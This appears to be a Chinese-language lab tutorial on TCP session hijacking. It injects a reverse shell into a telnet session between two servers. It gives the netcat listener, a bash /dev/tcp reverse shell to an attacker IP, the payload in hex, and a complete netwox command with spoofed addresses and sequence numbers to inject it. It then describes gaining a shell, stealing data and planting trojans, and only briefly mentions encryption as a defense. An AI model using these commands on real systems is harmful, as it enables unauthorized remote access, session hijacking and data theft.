TCP劫持下的反弹Shell注入攻击

反弹Shell的注入

 

思路:

通过劫持Server与数据Server的TCP报文,并伪造成Server,向其注入反弹Shell,使攻击者获得对数据Server的完全控制,窃取数据

 

全局模式下测试:

攻击者Kali监听这个10000端口

$ nc -lp 10000 -vvv

 

数据Server跟Kali进行TCP会话的建立

# bash -i>&/dev/tcp/192.168.211.130/10000 0>&1

 

此时攻击者就连接上了数据Server,而且是root权限,接下来就可以注入木马,窃取数据

劫持下的反弹Shell注入

 

步骤:

1.首先获取Server与数据Server的TCP会话

Server telnet 数据Server

 

2.将注入的代码段转换成16进制格式

攻击代码

bash -i>&/dev/tcp/192.168.211.130/10000 0>&1

16进制 并在其后加入0d00

62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00
sudo netwox 40 --ip4-ttl  64 --ip4-protocol  6 --ip4-src 192.168.211.134 --ip4-dst 192.168.211.133   --tcp-src  48271 --tcp-dst 23  --tcp-seqnum 1853475182 --tcp-acknum 1216288044  --tcp-ack  --tcp-psh --tcp-window 227 --tcp-data  62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00

实施攻击:

 

终端栏的第四个窗口是Kali正在进行监听的TCP端口号为10000的会话

查看:可见Kali已经攻击成功,并且进入到了数据Server,这里之所以是redhat用户,是因为Server telnet的是数据Server上的redhat用户

详细分析:

观察打击后的两个telnet包,可见是Server发送给数据Server一个数据为 攻击者Kali注入的代码,但是此时,其实是攻击者冒充了Server,对于数据Server来说,他并不知道,因为攻击者Kali将源目IP、源目端口、ACK、SEQ都伪造了,数据Server是无法判断的,数据Server还会给他一个回应,这一旦回应,攻击者Kali直接登录到数据Server上

 

这时,Server就断开了与数据Server的telnet连接,一直等不到回应是因为此时的telnet来连接时攻击者Kali与数据Server建立的,这样一直虚假重传,过会就会断开连接

而此时,Kali可以随意的窃取并留下一些木马病毒

防御:

       使用SSL加密tcp ,ipsec加密IP,二层加密

 


 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章